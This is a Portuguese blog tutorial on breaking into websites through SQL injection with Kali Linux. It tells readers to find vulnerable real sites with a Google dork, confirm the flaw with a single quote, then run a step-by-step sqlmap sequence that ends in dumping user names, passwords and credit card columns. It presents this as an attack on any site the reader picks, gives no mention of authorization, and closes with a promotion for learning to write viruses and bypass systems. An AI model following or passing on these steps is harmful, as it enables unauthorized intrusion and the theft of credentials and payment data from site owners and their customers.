Como invadir sites com Kali Linux - Falha SQL Injection (funcional)


Quem nunca pensou como poderia invadir um site? Quais as falhas possíveis nele? Como fazer todo esse ataque? Seria fácil?

Hoje, vou te ensinar como invadir um site com falha SQL no Kali.





Achando o site correto

Vamos invadir um site com falha SQL, então vamos usar o Google Hacking. 

Para saber mais e se aprimorar nessa técnica, clique aqui para acessar meu post Google Hacking.

Coloque no Google a seguinte pesquisa: 

inurl: (tipo de site que você quer).php? id=

EX:

inurl: vendas.php? id=

Todos os sites que tiverem no final da url id=12 ou qualquer outro número, provavelmente tem uma falha SQL

Para ter certeza que o site é vulnerável, depois do sinal de igual (id=) coloque uma aspas simples (') ou qualquer outra coisa. 

Caso apareça na tela uma mensagem que vai estar escrito algo sobre SQL, o site tem como invadir.

Começando o ataque

Na Área de Trabalho do Kali, vá na opção Applications, ache o app Sqlmap e abra-o. 

Digite no terminal o seguinte comando: 

sqlmap -u (link do site, do jeito que você achou, com o id= e http) --dbs

E pressione ENTER. 

Ex: sqlmap -u https://site-alvo.com/id=12

Talvez aparecerá algumas perguntas em Inglês, se isso acontecer, traduza-as e coloque Y para sim e N para não.

Nós iremos repetir vários comandos, então para não ficar reescrevendo tudo, aperte na seta para cima do seu teclado.   

Depois de ter feito isso, apague a parte do comando que está escrito "--dbs" e coloque "-D  --tables".

Agora, se ocorreu tudo certo, está aparecendo a tabela do site no seu terminal. 

Apague novamente a parte escrita "--tables" 

E no lugar dela escreva:

-T  users --columns 

e pressione ENTER.

Agora, aparecerá as colunas do site.

No meu caso estão aparecendo na coluna as opções: 

adress, cart, cc, email, name, pass, phone e uname.

Caso você queira saber alguma dessas informações (no site que estiver invadindo pode ser diferente), apague a seguinta parte:

--columns

E no lugar dela coloque: 

-C *opção que deseja,* --dump 

No meu caso ficará assim: 

sqlmap-u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users -C uname, password, cc --dump

Ok. Ataque sucedido, se ocorreu tudo certo, aparecerá em seu terminal os dados que solicitou.




Avançado

Ok, essa parte é apenas para quem quer realmente se tornar hacker ético, entender mais sobre computação em geral e/ou aprender a programar.

Se você quer ser APENAS um hacker de Facebook com página falsa, esse tópico não é para você. Lamento. Temos outros posts falando disso.

Você quer aumentar seus conhecimentos para se tornar um profissional, certo? Ou pelo menos ter o conhecimento de um, não é?

Aprender a criar vírus, resolver os problemas sem ter que ficar pesquisando tutorial, e burlar todo tipo de sistema e rede?

Então você está no lugar certo! 

Eu sei como é ruim ficar procurando tutoriais atoa, não achar o que precisa, aprender coisas limitadas que vão servir apenas para uma coisa....

Por isso eu resolvi te revelar o segredo para você ter a liberdade e o conhecimento de burlar sites, redes, sistemas, computadores, celulares e sistemas operacionais (até mesmo Linux).

Um hacker nada mais é que alguém que entende tudo sobre como funciona as redes, os servidores, os computadores, sistemas operacionais, sites etc...

Cada um deles é formado por uma linguagem de programação, logo, para você por invadir eles, primeiro terá que entender como é feito, como funciona.

E para isso, terá que aprender algumas linguagens de programação.

Eu separei pra você algumas linguagens que tenho certeza que você irá precisar. 


Sem essas linguagens inúteis que não servem pra nada e você não vai usar. Apenas as úteis que realmente são essenciais para ser um profissional de segurança da informação.

Caso tenha interesse em saber quais são, como aprender da melhor forma e quais são os benefícios, clique aqui para acessar meu post onde explico tudo mais detalhadamente.

3 comentários: